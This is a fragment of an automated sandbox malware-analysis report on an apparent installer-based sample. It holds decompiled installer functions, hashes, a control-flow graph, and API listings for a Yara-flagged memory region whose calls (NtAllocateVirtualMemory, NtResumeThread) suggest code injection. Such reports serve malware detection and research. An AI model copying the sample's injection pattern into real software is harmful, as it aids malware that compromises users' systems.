                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00000000
                                                              0x0040753b
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00000000
                                                              0x00407390
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E004021AA(void* __eflags) {
                                                              				signed int _t52;
                                                              				void* _t56;
                                                              				intOrPtr* _t60;
                                                              				intOrPtr _t61;
                                                              				intOrPtr* _t62;
                                                              				intOrPtr* _t64;
                                                              				intOrPtr* _t66;
                                                              				intOrPtr* _t68;
                                                              				intOrPtr* _t70;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t74;
                                                              				intOrPtr* _t76;
                                                              				intOrPtr* _t78;
                                                              				intOrPtr* _t80;
                                                              				void* _t83;
                                                              				intOrPtr* _t91;
                                                              				signed int _t101;
                                                              				signed int _t105;
                                                              				void* _t107;
                                                              
                                                              				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                              				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                              				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                              				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                              				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                              				_t52 =  *(_t107 - 0x20);
                                                              				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                              				_t101 = _t52 & 0x00008000;
                                                              				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                              				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                              				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                              					E00402DA6(0x21);
                                                              				}
                                                              				_t56 = _t107 + 8;
                                                              				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
                                                              				if(_t56 < _t83) {
                                                              					L14:
                                                              					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                              					_push(0xfffffff0);
                                                              				} else {
                                                              					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                              					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                              					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                              					if(_t61 >= _t83) {
                                                              						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                              						if(_t101 == _t83) {
                                                              							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
                                                              						}
                                                              						if(_t105 != _t83) {
                                                              							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                              						}
                                                              						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                              						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                              						if( *_t91 != _t83) {
                                                              							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                              						}
                                                              						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                              						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                              						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                              							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                              							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                              						}
                                                              						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                              						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                              					}
                                                              					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                              					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                              					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                              						_push(0xfffffff4);
                                                              					} else {
                                                              						goto L14;
                                                              					}
                                                              				}
                                                              				E00401423();
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                              				return 0;
                                                              			}






















                                                              0x004021b3
                                                              0x004021bd
                                                              0x004021c7
                                                              0x004021d1
                                                              0x004021dc
                                                              0x004021df
                                                              0x004021f9
                                                              0x004021fc
                                                              0x00402202
                                                              0x00402205
                                                              0x0040220f
                                                              0x00402213
                                                              0x00402213
                                                              0x00402218
                                                              0x00402229
                                                              0x00402231
                                                              0x004022e8
                                                              0x004022e8
                                                              0x004022ef
                                                              0x00402237
                                                              0x00402237
                                                              0x00402246
                                                              0x0040224a
                                                              0x0040224d
                                                              0x00402253
                                                              0x00402261
                                                              0x00402264
                                                              0x00402266
                                                              0x00402271
                                                              0x00402271
                                                              0x00402276
                                                              0x00402278
                                                              0x0040227f
                                                              0x0040227f
                                                              0x00402282
                                                              0x0040228b
                                                              0x0040228e
                                                              0x00402294
                                                              0x00402296
                                                              0x004022a0
                                                              0x004022a0
                                                              0x004022a3
                                                              0x004022ac
                                                              0x004022af
                                                              0x004022b8
                                                              0x004022be
                                                              0x004022c0
                                                              0x004022ce
                                                              0x004022ce
                                                              0x004022d1
                                                              0x004022d7
                                                              0x004022d7
                                                              0x004022da
                                                              0x004022e0
                                                              0x004022e6
                                                              0x004022fb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004022e6
                                                              0x004022f1
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 542301482-670666241
                                                              • Opcode ID: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                              • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                              • Opcode Fuzzy Hash: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                              • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040699E(WCHAR* _a4) {
                                                              				void* _t2;
                                                              
                                                              				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                              				if(_t2 == 0xffffffff) {
                                                              					return 0;
                                                              				}
                                                              				FindClose(_t2);
                                                              				return 0x426798;
                                                              			}




                                                              0x004069a9
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069bf
                                                              0x004069b5
                                                              0x00000000

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(76083420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,76083420,?,76082EE0,00405D94,?,76083420,76082EE0), ref: 004069A9
                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                              • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                              • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ec12fdcdfec0174a57bf545aeca7ecdc50c5e290aab7610ed6b7415c53a2e5b
                                                              • Instruction ID: 2d1e0ec3fb79a2087ae4f15132ee77733ff6d5fdba6f0955f56d27ffb2e19a62
                                                              • Opcode Fuzzy Hash: 6ec12fdcdfec0174a57bf545aeca7ecdc50c5e290aab7610ed6b7415c53a2e5b
                                                              • Instruction Fuzzy Hash: 8CB1327162838A9FDB749E28CD917EB77F6EF953A0F81451EDC889B204D3709981CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 6f107f67a8a1decc76da64245a1041e94136821fdb460df0a6ed9757eac1780f
                                                              • Instruction ID: cc6b15073e21e2c237b53e4181b4bd30c4fa7fbc7e7651d0576e5a1ae683ae84
                                                              • Opcode Fuzzy Hash: 6f107f67a8a1decc76da64245a1041e94136821fdb460df0a6ed9757eac1780f
                                                              • Instruction Fuzzy Hash: FA6121B16143899FCF30AF69CC88BEE7BA2EF99750F45412EDC888B214D3704981CB02
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 032C1274: LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              • NtAllocateVirtualMemory.NTDLL(8C758DFA), ref: 032C20E4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateLibraryLoadMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2616484454-0
                                                              • Opcode ID: 568ecfbd35617bf66d0b2f6cd2e2b6705b1044de067694e95e202f4b676010f9
                                                              • Instruction ID: 04f3e3f709f0fc1b541952af3d30351fcc7345f8fcf50113e3b4f504c3d8f47c
                                                              • Opcode Fuzzy Hash: 568ecfbd35617bf66d0b2f6cd2e2b6705b1044de067694e95e202f4b676010f9
                                                              • Instruction Fuzzy Hash: 3E513138624389DFDF30DE64CCA53EE37A2AF4A350F85451EDD8A9B211DB304AC5CA42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: b44cf2a2d64ab204dbf1813489ffbe1ca98095659b144d56f2673c8e71902e19
                                                              • Instruction ID: 96feda213bcc350c66bfec1a8bb156d6f95113771656e6a603cd219d7ad58480
                                                              • Opcode Fuzzy Hash: b44cf2a2d64ab204dbf1813489ffbe1ca98095659b144d56f2673c8e71902e19
                                                              • Instruction Fuzzy Hash: 2031F07467178BDFCB30EE14C995FEA73A6BF85750F58412EDC088B245D371A980CA20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileA.KERNELBASE(?), ref: 032C0BA4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 43debf2e7a280db9a3fa9d3eb431f754a11505ec62c3ebadcca43be9b0b658d3
                                                              • Instruction ID: db57096107f3f898126f82f0ceab8b63b62c2ab3e773c4fe32a5bc9fbd2a667a
                                                              • Opcode Fuzzy Hash: 43debf2e7a280db9a3fa9d3eb431f754a11505ec62c3ebadcca43be9b0b658d3
                                                              • Instruction Fuzzy Hash: 7C313572928355DFE718EE38C9516EAB7A1FF95340F55881ED9C696104E3308882CF03
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtResumeThread.NTDLL(00000001,032C482D,CA23251A,032BFAA9,00000000,032B28E1), ref: 032C4439
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 2cee38b42289b0bf26be37c59f54b5da73dc0592905e9afab6dc477c9cd8f516
                                                              • Instruction ID: 6afa3583dd2a198deed5b1388d5f18f84d9c5287494f6bedaf796e3dd44e6871
                                                              • Opcode Fuzzy Hash: 2cee38b42289b0bf26be37c59f54b5da73dc0592905e9afab6dc477c9cd8f516
                                                              • Instruction Fuzzy Hash: 7A212931634285CBDB25EEB589E53DA3365EFC5340F74422ECE468B108D3B594C5CB12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 199 4040e9-4040f2 195->199 197 40429c-4042b1 196->197 198 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->198 201 4042f1-4042f6 call 404610 197->201 202 4042b3-4042b6 197->202 198->197 203 4040f4-404101 SetWindowPos 199->203 204 404107-40410e 199->204 218 4042fb-404316 201->218 206 4042b8-4042c3 call 401389 202->206 207 4042e9-4042eb 202->207 203->204 209 404110-40412a ShowWindow 204->209 210 404152-404158 204->210 206->207 234 4042c5-4042e4 SendMessageW 206->234 207->201 217 404591 207->217 211 404130-404143 GetWindowLongW 209->211 212 40422b-404239 call 40462b 209->212 214 404171-404174 210->214 215 40415a-40416c DestroyWindow 210->215 211->212 219 404149-40414c ShowWindow 211->219 222 404593-40459a 212->222 223 404176-404182 SetWindowLongW 214->223 224 404187-40418d 214->224 221 40456e-404574 215->221 217->222 227 404318-40431a call 40140b 218->227 228 40431f-404325 218->228 219->210 221->217 230 404576-40457c 221->230 223->222 224->212 233 404193-4041a2 GetDlgItem 224->233 227->228 231 40432b-404336 228->231 232 40454f-404568 DestroyWindow EndDialog 228->232 230->217 236 40457e-404587 ShowWindow 230->236 231->232 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 231->237 232->221 238 4041c1-4041c4 233->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 241 4041c6-4041c7 238->241 242 4041c9-4041cc 238->242 239->217 239->238 244 4041f7-4041fc call 40459d 241->244 245 4041da-4041df 242->245 246 4041ce-4041d4 242->246 244->212 249 404215-404225 SendMessageW 245->249 251 4041e1-4041e7 245->251 246->249 250 4041d6-4041d8 246->250 249->212 250->244 252 4041e9-4041ef call 40140b 251->252 253 4041fe-404207 call 40140b 251->253 262 4041f5 252->262 253->212 263 404209-404213 253->263 262->244 263->262 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->218 286 404464-404466 275->286 286->218 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->217 290 40447e-404484 288->290 289->221 291 4044a9-4044d6 CreateDialogParamW 289->291 290->218 292 40448a 290->292 291->221 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->221
                                                              C-Code - Quality: 86%
                                                              			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                              				struct HWND__* _v28;
                                                              				void* _v80;
                                                              				void* _v84;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t34;
                                                              				signed int _t36;
                                                              				signed int _t38;
                                                              				struct HWND__* _t48;
                                                              				signed int _t67;
                                                              				struct HWND__* _t73;
                                                              				signed int _t86;
                                                              				struct HWND__* _t91;
                                                              				signed int _t99;
                                                              				int _t103;
                                                              				signed int _t117;
                                                              				int _t118;
                                                              				int _t122;
                                                              				signed int _t124;
                                                              				struct HWND__* _t127;
                                                              				struct HWND__* _t128;
                                                              				int _t129;
                                                              				intOrPtr _t130;
                                                              				long _t133;
                                                              				int _t135;
                                                              				int _t136;
                                                              				void* _t137;
                                                              
                                                              				_t130 = _a8;
                                                              				if(_t130 == 0x110 || _t130 == 0x408) {
                                                              					_t34 = _a12;
                                                              					_t127 = _a4;
                                                              					__eflags = _t130 - 0x110;
                                                              					 *0x423730 = _t34;
                                                              					if(_t130 == 0x110) {
